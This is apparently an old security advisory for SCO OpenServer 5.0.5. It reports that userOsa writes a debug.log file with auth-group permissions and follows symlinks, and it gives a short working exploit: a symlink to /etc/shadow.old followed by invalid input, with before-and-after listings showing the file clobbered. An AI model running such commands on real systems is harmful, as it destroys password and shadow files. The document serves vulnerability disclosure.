COMMAND

    /etc/sysadm.d/bin/userOsa

SYSTEMS AFFECTED

    SCO OpenServer 5.0.5

PROBLEM

    Brock Tellier found  following.  Any  user may overwrite  any file
    with   group   auth   (i.e.   /etc/shadow,   /etc/passwd)    using
    /etc/sysadm.d/bin/userOsa.   Note that  this will  not change  the
    permissions of the file  or allow for the  user to input a  passwd
    entry  string  into  these  files,  it  will  simply  clobber  the
    contents of the file with debug output.

    When  userOsa  recieves  invalid  input,  it  generates a log file
    called "debug.log" in  the PWD.   This file is  created with group
    auth permissions,does  not check  for this  file's existence,  and
    will follow symlinks. Thus the exploit is as follows:

        scohack:/tmp$ ln -s /etc/shadow.old debug.log
        scohack:/tmp$ /etc/sysadm.d/bin/userOsa
        bah
        connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ {Invalid Connect Request: bah}}}
        Failed to listen to client
        Failure in making connection to OSA.
        scohack:/tmp$

    BEFORE EXPLOIT:

        scohack:/# l /etc/shadow.old
        -rw-rw----   1 root     auth          26 Oct 11 20:08 /etc/shadow.old

    AFTER EXPLOIT (note the file size):

        scohack:/# l /etc/shadow.old
        -rw-rw----   1 root     auth         177 Oct 11 20:10 /etc/shadow.old

        scohack:/# cat /etc/shadow.old
        >>> Debug log opened at Mon Oct 11 03:10:04 PM CDT 1999 by <PID=11604>
		<<<
        SendConnectFail(connectFail {{SCO_LOCAL_PIPE_ERR_INVALID_CONNECT_REQ
        {Invalid Connect Request: bah}}})

        scohack:/#

SOLUTION

    Nothing yet.